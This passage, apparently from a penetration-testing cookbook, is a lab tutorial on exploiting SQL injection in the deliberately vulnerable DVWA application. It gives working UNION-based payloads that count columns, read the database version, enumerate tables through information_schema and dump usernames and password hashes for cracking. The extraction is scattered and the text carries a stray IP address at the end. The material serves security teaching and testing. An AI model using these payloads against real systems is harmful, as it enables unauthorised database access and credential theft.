We saw in Chapter 4, Finding Vulnerabilities, how to detect an SQL Injection. In this recipe, we will exploit an injection and use it to extract information from the database.
http://192.168.56.102/dvwa/vulnerabilities/sqli/
.id
parameter with 1' order by 1 -- ' and click on Execute.order by
and executing the requests until we get an error. In this example, it happens when ordering by 3.id
to 1' union select 1,2 -- '
and Execute.id
to 1' union select @@version,current_user() -- '
and Execute.id
to 1' union select table_schema, table_name FROM information_schema.tables WHERE table_name LIKE '%user%' -- '
.dvwa
and the table we are looking for is users
. As we have only two positions to set values, we need to know which columns of the table are the ones useful to us; set id
to 1' union select column_name, 1 FROM information_schema.tables WHERE table_name = 'users' -- '
.id
to 1' union select user, password FROM dvwa.users -- '
.In the First name
field, we have the application's username and in the Surname
field we have each user's password hash; we can copy these hashes to a text file and try to crack them with either John the Ripper or our favorite password cracker.
From our first injection 1' order by 1 -- ' through 1' order by 3 -- ' we are using a feature in SQL language that allows us to order the results of a query by a certain field or column using its number in the order it is declared in the query. We used this to generate an error and be able to know how many columns the query has, so we can use them to create a union query.
The UNION statement is used to concatenate two queries that have the same number of columns, by injecting this we can query almost anything to the database. In this recipe, we first checked if it was working as expected, after that we set our objective in the users' table and investigated our way to it.
The first step was to discover the database and table's names, we did this by querying the information_schema
database, which is the one that stores all the information on databases, tables, and columns in MySQL.
Once we knew the names of the database and table, we queried for the columns in such table to know which ones we were looking for, which turned out to be user and password.
And last, we injected a query asking for all usernames and passwords in the table users
of the database dvwa
.
3.138.117.75